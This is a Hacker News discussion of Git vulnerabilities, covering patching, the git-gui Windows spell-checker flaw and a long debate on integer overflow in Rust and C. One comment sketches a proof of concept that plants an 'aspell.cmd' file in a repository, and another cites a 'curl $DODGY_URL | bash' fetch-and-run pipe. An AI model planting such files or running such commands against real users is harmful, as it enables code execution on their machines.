Hacker News new | past | comments | ask | show | jobs | submit login
Git security vulnerabilities announced (github.blog)
387 points by ttaylorr on Jan 17, 2023 | hide | past | favorite | 127 comments



I don't think Apple has patched this yet (it just came out 3 hours ago). Looks like homebrew got right on it so I installed via that with the following command.

`brew install git`

The latest version in Ventura 13.1 seems to be either 2.24.3 or 2.37.1 (not all my co-workers machines match). I'm not sure if these are defaults, different because some of us have XCode, or if some of us manually installed. In any case, brew install got me up to date.


I too think package managers are amazing...

reads new git security threat

"brew upgrade"

done!


Running brew upgrade uses git, so it has to run the insecure git to upgrade.


Wait until you hear about how your OpenSSL patches get delivered!


Via signed Git tags?

  object 19cc035b6c6f2283573d29c7ea7f7d675cf750ce
  type commit
  tag openssl-3.0.7
  tagger Tomas Mraz <tomas@openssl.org> 1667335515 +0100

  OpenSSL 3.0.7 release tag
  -----BEGIN PGP SIGNATURE-----

  iQJGBAABCAAwFiEE3HAyZir4heL0fyQ/UnRmohynnm0FAmNhhWASHHRvbWFzQG9w
  ZW5zc2wub3JnAAoJEFJ0ZqIcp55tZRkQAJKQ35fUFQ3Wfuj4vbNQNX0Iv/c11q9o
  7Li8A8ananoYhnW9tpVTfpBCHAbE/fvwY3TMCE6IzBsRcjjef1CAqtEEDYI39aEt
  Nr00hUTVQeeH95viYMhmelq6axjkX8dGjfZBufZPJzrKrrj/eZLfmL3A1nZ9yYeF
  MCTxzpcOtaanJQ35h1Ayx3Hj1mcfTixGZR1drlJa5pDoF3y40ysxt/3ZYRD0Z/hO
  NbQ5QK/GPjnBheJaha6X7BoGgMRzXCfVSqtP/hE2Szzdq3nkZbWuDYw8EQ+Nr8Ni
  Q0BIIZLQbTYf4lmTXMbZdgUFq9/vSFNuz2IudDGiHrVfV1HZrZigHly61gqaXhjF
  Uir2LjMEgMr7D4O0udM6RnR7A1Wn3++sc8m3bGHYj+j+oSHSiKpZ0yxKbGY0TITL
  1/vJMBZe46rW2qQi8WI4fkRnyRVc+L19AHqHYeA9XHMWKFgRKgHlf+yf2ysPKsD6
  lGYCFwLJrlec/Sq4mbwe59JwtQbf4LHUQ4k+M1Cr5q04WegMH/nFjOanv8Ehs1Se
  WqJZD/1O+p8Go71g7c8kJ9QYiHkkr/xgs8BF7WMlNw7df5za6V1Ns/VCMSfQ9HF8
  SlODL7NBffQr0A9rGD/AueN2pATzv1p90/Cz5VCIWRfCHMN6EmurdGcSJkSXRbjY
  SDAGDysitYmo
  =/eQF
  -----END PGP SIGNATURE-----


And how, pray tell, are you downloading those signatures? Or the public keys corresponding to them, for that matter, if you don't have them locally already (and, if you do, why do you trust them given that your transport layer has been compromised?)

Besides: if you actually verify `git` signatures, you can count yourself in a club of less than a dozen people who bother. That isn't to say that you're wrong to, just that an optional signature is, to a first approximation, as useful as not signing at all.


The public keys for those signatures have already been downloaded by any vendor who knows what they're doing; a new TLS forgery vulnerability won't really hurt there.

Or, let's put it this way: If you don't bother with the signatures, a TLS forgery likely isn't the easiest way to feed you a fake openssl release, hijacking an account or hacking Github et al are.

Also, Github itself verifies Git signatures, and the maintainers seem to have Github's "vigilant mode" on.


brew repositories are hosted at Github. According the linked article Github did a full scan on all repositories whether those attacks were already in use and implemented mitigations to make it impossible to push attacks to Github. I.e. it should be safe to run brew upgrade.


ugh technically correct, the best type of correct



[Edit: According to @rlpb's comment, git 2.39.1 is already available on Ubuntu]

To install the latest git on Ubuntu:

  sudo apt upgrade git
[Former post included instructions on how to install git from https://launchpad.net/~git-core/+archive/ubuntu/ppa]


> [Edit: According to @rlpb's comment, git 2.39.1 is already available on Ubuntu]

Note that I said Ubuntu's git package was updated, but didn't say to what version. Ubuntu like most stable distributions cherry-pick security fixes rather than bump major versions, so Ubuntu users will get a version with these vulnerabilities patched but not necessarily a bump up to 2.39.1. See https://ubuntu.com/security/notices/USN-5810-1 for details.


Ubuntu will update git, without having to add this.


Indeed! Ubuntu updated git at 18:44Z, nearly an hour before you posted that comment :-)


Hopefully soon :)


> git 2.39.1 is already available on Ubuntu

The updater just gave me 1:2.37.2-1ubuntu1.2 (to replace 1:2.37.2-1ubuntu1.1). It said it addresses the two CVEs in question.

So they (Ubuntu or maybe Debian) are taking the approach of patching a slightly older git version.


I'm not sure why they aren't bumping the patch number, maybe they decided against applying the other parts of the patch for least change - but at least the CVEs are mentioned in all of the Ubuntu changelogs.

I can't find anything in the Debian changelogs referring to the CVEs. Yet the Ubuntu changelog refers to it as a debian patch...

Anyone know anything about Debian?



Thank you!


What is git doing with the system’s spell checker? This is the first time I’ve read about git using a spell checker. I know that various gui clients do spell checking, but I’m not aware of git itself doing anything related to this.


As the article states, it's a feature of git-gui, not the git CLI.

The vulnerability is Windows-only, so maybe whatever Windows users do to install git always gives them git-gui. But at least for Linux, the distro might package it separately (mine does), so you won't even have it if you didn't install it.


As best I can tell from the "The Windows-specific issue involves a $PATH lookup including the current working directory" part, it would be:

    echo "calc.exe" > aspell.cmd
    git commit -a -m"lolol windows"
and wait for someone to clone that repo


What I don't quite get is why there's spellchecking on incoming commits at all.


Don't understand what you mean by "incoming commits". git-gui shows you a textbox for the commit message, and error squiggles for misspelled words (presumably; I CBA to install a spell checker). The bug is that it spawns the spellcheck binary using Tcl's API, which on Windows also looks up binaries in the current directory regardless of whether the current directory is in $PATH or not.

Edit: Maybe you're referring to the existing commits in the repo that you just cloned? If so, those are irrelevant. git-gui is a GUI for composing commits. The commit message being spell-checked is the one that you would write in order to create a new commit.


My reason for asking that is that this is the vuln description from the article:

> After cloning a repository, Git GUI automatically applies some post-processing to the resulting checkout, including running a spell-checker, if one is available.

> A Windows-specific vulnerability causes Git GUI to look for the spell-check in the worktree that was just checked out, which may result in running untrusted code.

I get what you're saying that just in general, there's an issue that you could put a file that matches the name for the spellchecker command in the repo and thereby have git-gui run your payload when the spellchecker should run.

But the article says this is "post-processing" to a checkout. That's what doesn't make sense to me, but the CVE itself says the same thing, that aspell is getting run immediately after a clone. What's the point of doing that?


It's phrased badly. I can see that it sounds like it's post-processing the new clone by running spellcheck on all the commits of the cloned branch, but it definitely doesn't do that. I checked the code just to be sure and there's nothing like that in the clone code. (Unless I'm missing something, but as you said I can't fathom why it would need to do that.)

What happens is that, when you use it clone a repo it immediately shows the window for authoring a new commit message, which as I said will invoke the spell-check. That's why you are vulnerable from the moment you use git-gui to clone.


I’m pretty sure it’s spell-checking the next commit the user will make, which on an new repository is of course empty, but there's no special case to start the spell-checker only when the user starts writing. (The “post-processing” the article refers to, I think, is just starting up the GUI on the repo, which includes setting up the textbox for the commit message. In fact I’m pretty sure the act of cloning is irrelevant, that’s just the most likely way for an unwitting user to get a malicious repository.)


Regarding first vulnerability with gIt format, how can malicious party exploit it? Someone needs to convince you to run git log format with some unusual format specifier, right? And then they need to access some specific memory location this way so they still need to store something malicious elsewhere. Sounds like it would be really extremely hard for anyone to exploit this.

Overall fixing this it looks like routine house keeping and nothing major.


As stated in the advisory:

> It may also be triggered indirectly via Git’s export-subst mechanism, which applies the formatting modifiers to selected files when using git archive.

This very practical to exploit on Git forges like GitHub or GitLab which allow their users to download archives of tags or branches.


You could bury it in a script, or in one of the many "copy and paste this command into your terminal" blurbs that we see all over the place.


This sounds like Raymond Chen's "code execution leads to code execution" class of vulnerabilities: if you can trick users into running a malicious script, you have already won.


If you can trick a user to run any arbitrary script blindly, sure, you've already won.

The hard part is tricking a user into running a script that they can inspect, and looks even on close inspection to be non-arbitrary and quite constrained in what it might do.

There's a world of difference between being gullible enough to run `curl $DODGY_URL | bash`, and thinking "what could possibly go wrong" when being asked to check the output of `git log --format="$WEIRD_FORMAT"`. Even if you check that $WEIRD_FORMAT doesn't escape shell quoting and pull a Bobby Tables, or run a `` or $() subshell, or do anything except pass a weird looking format string, there's no way to tell that there's a genuine bug in the `git log` formatting code that allows a specially-crafted format specifier to do ACE.


Pretty narrow vector. Could identify low level employee in another team to run it to exfiltrate info in a high secure env maybe.


What is the recommended upgrade path for macOS' system install of git?

I have upgraded my brew install, but am unsure of what to do with the vulnerable system install.


I don't think macOS comes with git; like, it might actually come with a git binary, but that binary is just a "shim" that runs an actual copy of git from an installed copy of Xcode. If you want to upgrade what is conceptually that copy of git you can thereby upgrade Xcode. (If you haven't installed Xcode then it might have come from a related package called Xcode Command Line Tools that doesn't include Xcode.app; if you run these shims and don't have Xcode installed it offers to install this package for you automatically.)


I'm guessing a system security update will patch the git executable. No way would apple make you update Xcode just for this. (Well, maybe...)


Sounds terrible, however typically you’re checking out code you’re going to compile and run anyway.


That is a little less than typical for me. I sometimes check out code to read it or to decide if I should compile and run it.


Likewise; editor tooling is better than Github's. In general, I feel like "git checkout" alone being a potentially unsafe action breaks a lot of people's mental threat models.


You might find git-peek useful:

https://github.com/jarred-sumner/git-peek


Both critical bugs are integer overflows. It's unclear to me why our languages still default to modulo arithmetic semantics. I feel Rust had a chance to fix this, but also dropped the ball.


> Rust had a chance to fix this, but also dropped the ball.

By default, a Rust project will panic on integer overflow in debug builds and will overflow on release builds. Two key points to note, however:

1. You can change the setting so that your project panics in release or overflows in debug mode.

2. We reserved the right to change the default at some point in the future. This will probably be widely communicated before it ever happens, and last I heard we are still waiting for the cost of performing those checks to be "reasonable" before thinking about making such a change.


Furthermore, because integer overflow is defined behavior, the integer overflow is never considered a root cause in Rust. In order for an integer overflow to express as UB in Rust, you'd have to use it in conjunction with an `unsafe` block that was failing to ensure its invariants, and that would be considered the root cause. If you're not using `unsafe`, then an integer overflow is at worst a logic bug.


A logic bug can be dangerous too though. E.g. Bumping a user ID, to get a "fresh" one or calculate port to open based on offset. When not bounded to a known range, this kind of logic can easily pose a serious security risk. Most of the time, it will probably just work, but under extreme conditions, it will fail. If your language at least catch the overflow and crash instead of wrapping around, you "only" have a denial of service.

Can imagine that implementing bounds checking can be costly, when done in software. Wonder if there are any hardware improvements that could reduce risk in this area.


Indeed, nobody ever said that logic bugs were good, but as a category of flaw it means that integer overflow in Rust isn't particularly interesting compared to all the other innumerable ways to introduce logic bugs. And I say that as someone who wouldn't really mind if the behavior was changed to panic-by-default in release mode.


If you identify an area as risky, it's trivial in Rust to do a checked_add or saturating_add. The challenge is obviously identifying this, but having easy library functions anectotally leads to people looking for it in code reviews.


A logic bug can be just as bad as any other kind of bug. Security bugs/memory corruption don't always deserve the extra special treatment they get, nor are they the only kind of remotely exploitable issue.


Just in case people don't know, you can get the same behavior with C or C++ by invoking GCC or Clang with -ftrapv. I don't know about Rust, but for C and C++ -ftrapv will only fault on signed integer overflow, as signed integer overflow is UB in C/C++ but unsigned integer overflow is well defined (it's guaranteed to wrap around to zero on all platforms). So even if you're trapping on integer overflow, there are still plenty of weird things that can happen if you unintentionally overflow an unsigned integer.


> I heard we are still waiting for the cost of performing those checks to be "reasonable" before thinking about making such a change.

What I don't understand is, checking for integer overflow is extremely cheap in hardware, so why is there any cost for performing those checks? What am I missing?


Part of it is that most CPU architectures don’t make overflow checking as cheap as it could be (there’s no option to trap on overflow, so you need a branch after every arithmetic operation, which has some cost). Another part is the compiler: a lot of compiler optimizations assume that arithmetic is a pure operation that can be added and removed and reordered as needed. So right now, adding overflow checks means opting out of a ton of optimizations. With care it may be possible to recover most of those optimizations, but it would require major improvements to LLVM.


This is a great point. But how about if the language would allow the programmer to specify what range of values is expected for function input/output?

Then a compiler could try to reason about the computation and decide that overflow does not happen if all values are within bounds, and just add checks at the function boundaries.


This would require more checks, not fewer?


Integer arithmetic is a significant part of ~every program. A single branch that checks the overflow flag is not expensive. But branching on that flag every time you do integer math is death by a billion paper cuts.


Your could use interrupts, no? Basically free when not triggered and when triggered you probably don't care about performance anymore.


Most architectures do not provide an interrupt that is generated by an integer overflow. Since this would be a significant architectural change in the hardware, it can't be simply added in.

Additionally, if you are running inside an operating system, handling an interrupt usually incurs a trip through the kernel, which would add extra overhead every time an overflow did happen. Since there's a lot of software which depends on integers overflowing, this overhead on each overflow could significantly impact legacy software.


Using a new instruction none of that would be an issue. And as someone pointed out, on x86 it wouldn't even be a new instruction, INTO already exists. But apparently it didn't make it in x64 because nobody used it :/


x86 at one time had a single-byte instruction that would trap if the overflow bit was set, INTO. It doesn't exist in 64-bit mode, I believe, and it was never widely used as far as I know. The performance implications of adding even a single additional instruction to every integer operation were probably still prohibitive? (And there's a history in x86 of specialized clever instructions and mechanisms going unused, due to being slower than doing the same thing some other way.)


Presumably the program has to check bit in a status register or something like that to tell if the previous instruction caused overflow, no? That means an extra branch after each arithmetic instruction. I imagine that's not cheap?


Fascinating. Haven't had a chance to do Rust yet, but I think I would change this so that they were consistent. I do embedded, and that kind of "behaves differently in different places" is the worst kind of bug to figure out.


> behaves differently in different places

It doesn't behave differently in different places, it differs based on build profile. You test in debug mode, which is where overflows will panic, which makes them quite obvious. If you want to pay the price of overflow checks everywhere in release mode, then you can turn them on there as well (it's not that much of a performance penalty, but that might not be true on embedded...). It's effectively just a compiler flag.


>It's unclear to me why our languages still default to modulo arithmetic semantics.

Because that's what processors do? (leaving aside backwards compatibility issues)


Our processors also require manually manipulating registers.

The whole point of higher level programming languages is to abstract away the fiddly bits of dealing with processors that we don't want to have to deal with.

This is one of those cases.


In this case it's really that the cost of determining if an overflow did occur or will occur on modern architectures is too high and the likelihood too low for it to be reasonable to perform the checks in most cases in native code. Might be different for interpreted languages depending on a lot of things (whether or not they even use integer arithmetic, whether or not they default to some arbitrary precision integers by default, etc.). If common architectures automatically interrupted on overflow rather than setting a flag at no additional cost, I'd think you'd see safety guarantees instantly.


In cases where you're willing to take the perf hit, you can just use languages like Python which abstract over integer size entirely.


Which used to, but at least for parsing ints they've snuck in the perf hit as a "security vulnerability."


Processors also emit a signal when there's an over/underflow. Is it costly to check that at a low level and terminate the process in this case?


Saturated arithmetic instructions do not do this.


And on the platforms where the ADD instruction uses saturated arithmetic I bet assert(UINT32_MAX + 1 == UINT32_MAX) in C passes.


Unsigned integers in C are defined to wrap on overflow, so they shouldn't be affected by what the underlying processor wants to do. And just because signed overflows are undefined doesn't mean you get what the processor provides either.

So basically, don't forget to test with UBSan.

(I don't like -fno-strict-overflow as a solution, because defining incorrect behavior isn't much better than undefined behavior.)


TIL modulo wrapping for unsigned ints is actually in the standard, I could have sworn it was implementation defined (as opposed to signed wrapping, which is undefined).


Rust does have a fix for this:

  error: this arithmetic operation will overflow
   --> src/main.rs:2:18
    |
  2 |     let a: u64 = u64::MAX + 1;
    |                  ^^^^^^^^^^^^ attempt to compute `u64::MAX + 1_u64`, which would overflow
    |
    = note: `#[deny(arithmetic_overflow)]` on by default
Rust also allows for overflowing arithmetic (preserving the default to fail):

https://doc.rust-lang.org/std/?search=overflowing

It's generally less ergonomic, e.g.

  let (zero, _did_overflow) = u64::MAX.overflowing_add(1);


Slightly related, I wonder why the return type for `overflowing_add` isn't `Result<T>` and instead a tuple containing a boolean?


There are times when you want to know how much overflow occurred -- think of the way you learn to do multi-digit addition. There is a checked_add that returns an Option<T> if you only care about success/failure.


An example is efficient prime-field arithmetic:

https://cp4space.hatsya.com/2021/09/01/an-efficient-prime-fo...

> If A happened to be larger than C, and therefore the result of the subtraction underflowed, then we can correct for this by adding p to the result. [...] we can multiply B by 2^32 using a binary shift and a subtraction, and then add it to the result. We might encounter an overflow, but we can correct for that by subtracting p.

(Highlighting the parts that relate to reacting to overflow.)


My guess is:

The `(T, bool)` that gets returned is friendly towards optimization.

If you don't use the bool, the overflowing arithmetic is reduced to efficient arithmetic which is overflowing by default. If you do use the bool, the generated code contains one extra instruction.


Probably because you'd want to access the value in either case, depending on your application.


Could be a `Result<T, T>` which would seem to express the intent better.


Sometimes, sure. But an overflow doesn't have to be an error, it can be what you're after and you just want to know when it happens.


Binary search is similar and the return type there is already Result<usize, usize>: https://doc.rust-lang.org/std/vec/struct.Vec.html#method.bin...


You'll get a compile error when rustc can statically prove that it'll overflow (as in your example above). That is generally not possible.

The correct answer is what shepmaster said in a sibling comment.


Edit: Gah, I'm a bit wrong too. There's the compiler error (this), and the runtime error (what I'm talking about below.)

Here's a link to the runtime variant: https://play.rust-lang.org/?version=stable&mode=debug&editio...

As a sibling notes, currently, this is for debug builds. So, if you change that playground to "Release", you'll see it wrap.

(I love this feature, and I wish they had done it in release mode too. The sibling comment has some notes on that, too.)

(But, e.g., were `git` written in Rust, presumably the end product would be a release build. Now, you can enable the check there, but that is something you have to do, today.)

(But also note, that, in all cases, it's well-defined. Vs. C, where some overflows are UB.)


Rust makes integer overflow panic in debug builds, so Rust code is effectively required to opt into overflowing operations for correctness reasons. It disables those checks on release builds for performance reasons, but as sibling comments point out, it reserves the right to change that behavior.

Unfortunately, there is a circular dependency here. Languages are reluctant to make integer overflows error conditions because there is a moderately high overhead to checking overflow conditions constantly, and processors (and compilers) are unwilling to make overflow checks cheaper because they benchmarks they care about don't do such checks.


That sounds like the similar, but opposite case of tail recursion optimization. Some languages/compilers don't do it because devs want stack traces. But allow TCO in and now the code that gets written is quite different than the code that would not do tail calls because TCO doesn't exist.

Also a surprising amount of undefined behavior gets relied on in code. I don't use Rust, but the idea that they could potentially change the future behavior on overflow seems... risky?


I'm wondering if what you are asking for is what Swift does - overflow kills your program, but you can opt into allowing it by using "Overflow Operators" (&+, &- and &*).

This crashes in Swift

   var potentialOverflow = Int16.max
   potentialOverflow += 1

This does not crash

   var potentialOverflow = Int16.max
   potentialOverflow &+= 1

[1] https://docs.swift.org/swift-book/LanguageGuide/AdvancedOper...


As others have mentioned, the default overflow behavior in Rust can be configured to panic. To explicitly wrap around on overflow in every configuration, you can use the newtype wrapper Wrapping, or use the wrapping_add(), wrapping_mul(), etc. methods on the basic integer types. There are also variations such as saturating_op(), checked_op(), and overflowing_op() to detect the overflow and handle it appropriately.


Sure, I was suggesting that what the OP is asking for is not what Rust does, but what Swift does. This is not a configuration thing, if you don't want a runtime exception on overflow, you must use a different arithmetic operator.

Swift's behavior comes at a cost - it is not exactly the fastest language out there ;) Another no-overflow oddity is that Swift doesn't have a rand() equivalent. You can't get fast psuedorandom numbers in Swift unless you are on the Mac, in which case you can import GameplayKit and get gaming-appropriate pseudorandom numbers.

EDIT - to be clear, I am not suggesting that anyone change their own chosen programming language. But if you'd like, install Swift on your dev machine and make a Swift implementation of the critical section of your Rust code. Debug, optimize, tweak, etc. And you'll get a pretty good idea of what kind of performance you have to give up to do what many people are asking :)


I'm quite paranoid about integer overflows, so in my hobby projects I now have a habit of always using helper functions (which generate an error on overflow) instead of "bare" math operators, and whenever I see a bare math operator without any checks in an open source project (and from what I've seen almost no one checks for overflows) I wonder whether they thought about potential consequences or I'm being too paranoid


My contribution to two open-source projects in recent years has involved a transition to the use of safe arithmetic, too.

I think it makes a lot of sense to think about. Ultimately, it matters more in some applications than in others.


Can you explain this as if I were a programmer who doesn't know what that looks like?


There are different ways to design it, but a simple version could be a function that takes 2 operands and 1 result pointer as inputs, and returns boolean (true if success, false if it overflowed):

    bool SafeAddIntInt(int32_t x, int32_t y, int32_t *r);
so the caller could say

    int32_t result;
    if (SafeAddIntInt(x, y, &result)) {
      // do something with result
    } else {
      // handle overflow
    }
An even simpler version could just abort on over/underflow.


Note that there is no such thing as integer underflow. INT_MIN-1 is an overflow just as much as INT_MAX+1.

Only floats can suffer from underflow, which happens when you want to represent a number whose absolute value is smaller than the floating point precision can allow (e.g. trying to represent 1/2^32 in a 32-bit float).


Because saturating math is not "more right", just "different wrong". The "right" way of checking an error condition after every integer operation is prohibitively expensive.

From the language side, what I wish for is a sort of NaN for integer operations. I would not want to check for overflow on every operation, but I would want to know after a couple of them if somewhere an overflow had occurred. On the hardware side this could be done with a sticky overflow bit, which some architectures already support.

I think the ball is on the hardware side and in my opinion Rust did the most sensible thing possible with contemporary hardware.


Integer overflow isn't a security issue unless your program's memory safety depends on the correctness of the integer operation. Safe rust doesn't (in any build mode), but C/C++ does.


> Integer overflow isn't a security issue unless your program's memory safety depends on the correctness of the integer operation.

That's simply not true and has wide-reaching horrible effects that can occur. The wrong number of tickets can be purchased from a website, charging for less than were purchased. The DNR order can be put in place instead of SAVE LIFE. There are countless security issues that can occur.

Saying that integer overflow is only an issue for memory safety is really bad and incorrect advice.


That's most logic issues though, is it not? I agree with you though, i wish Rust more commonly pushed "safer" (not in the UB way) code, like `Vec::get` and `u32::overflow_add` and etc.

Luckily lints help to easily ban the arithmetic/etc ops from projects. Nevertheless i feel it should be a bit closer to Rust's home.


Do you have data on the relative frequency and severity of non-memory safety integer overflow security issues?


Here are over 3k CVEs that contain "integer overflow". That shouldn't be considered a comprehensive search.

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=integer+ove...


You don't need to have to have historical stats to show that it can be a security issue.


I know at least about the DAO hack.


To elaborate on this: Rust always performs bounds checks on array accesses, so you can't get an out-of-bound read/write.


Is there a way to turn this off?


Not via a compiler flag, no. The way to "opt out" of bounds checks is to replace `foo[bar]` with `unsafe { foo.get_unchecked(bar) }` at a given callsite. And the use of `unsafe` is going to immediately raise the eyebrow of any code reviewer or auditor.


You don't know the business logic of every program. You can't say that a rust program won't have a security issue due to this.

`UserAccessLevel > Threshold`

Like there could be a million ways an integer becoming small could mess up something.

Also there are business logic issues as well


Sure, but a logic error is a fundamentally different class of error compared to a memory error. The potential harm of a logic error is limited in scope to what the program was written to be able to do. A memory error can lead to arbitrary code execution.


Logic errors can still be security issues, even if they don't violate memory safety.


Absolutely, and I didn't suggest otherwise. But a logic error generally won't lead to your entire system getting pwned unless the program that has the logic error is one for something like user administration or managing a database etc.


> I feel Rust had a chance to fix this

Don't see how. Given the hardware Rust is designed to program you have to compromise some or all of efficiency, memory usage and complexity to solve overflow.


Rust can guarantee some things about collections which are not possible in C, so a lot more range checks and overflow checks could be omitted. Together with actually having the saturating/overflowing/checked adds, this makes the whole thing a lot safer and easier to deal with where you need to.


Great. Tell bbojan how Rust didn't actually "drop the ball" then. When you do you'll be told about all the different ways Rust doesn't actually solve overflow. And those claims will likely be correct because they're self evident.

My point -- my sole point -- is that Rust is like it is because none of the alternatives are viable for Rust; Rust must run efficiently (as a "systems" level language use defines "efficient") on hardware that silently wraps words. Rust can't fix that and still be Rust. There is no ball to drop.


I wonder if using 64-bit integers all over the place would alleviate this a bit. If your integers represent some real quantities (sizes of objects, etc), the sizes have to be unrealistically huge to trigger an overflow. If your integer is a counter, it would take years to increment it in a tight loop to achieve an overflow.

The cost of operating on 64-bit integers is about the same as operating on 32-bit integers on most modern CPUs (except maybe 32-bit cores in MCUs).


The funniest is how Solidity does this. The language focused on transfers of money.



> url = https://github.com/gitster/git

huh, I would have thought for sure they would have linked to git/git from which that repo was forked

Also, the 2.39.1 tag alleges it was created Dec 13th - I wonder why they held it so long? I would have thought maybe embargo but the actual commit says "security fix" https://github.com/git/git/commit/01443f01b7c6a3c6ef03268b64...


this should really be the article link instead of that proprietary writeup by a company taking advantage of OSS

edit: just because someone puts up an "easy" ""free"" service, does not mean they are kind. GitHub is not your friend for git issues. I woul dhope this site would support true FOSS


No it shouldn't, an hour in this submission might have barely 7 points, not 177, and probably a comment or two bemoaning the readability and pointing out the clearer write-up(s) available for people not already keeping up with the mailing list.

If you don't believe me, have a look, this was probably submitted too, and is languishing somewhere off the front page while this one is at the top, by virtue of people voting for it and not the other.


lack of accessibility/discoverability and meager focus on looks has been a staple of FOSS for decades, but HN should be a site that helped with this, not one that supported proprietary uses of FOSS software to the benefit of an anti-competitive behemoth such as MS


remirk's link is missing the git-gui CVE so it's not a direct replacement.


I guess GitHub and similar providers could scan incoming commits for these in order to shield users who do not upgrade. We all know there will still be millions of those for years to come.


Seems like there are no updates available for Fedora just yet?


The patched version is in testing https://src.fedoraproject.org/rpms/git


I wonder if there's anyone left at Twitter to backport security fixes to the custom fork of git they use to support their monorepo.


One way to find out!


For those of us who use Homebrew, the patched Git 2.39.1 should be available after this PR is merged:

https://github.com/Homebrew/homebrew-core/pull/120818


PR is now merged


And the update is now a single `brew upgrade` away.


I don't know if "announced" is really the word they want to use here. It makes it sound like they're unveiling a new feature.


Normally these posts would by called advisories (or more specifically security advisories)

Some vendors use the term Security Bulletins




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: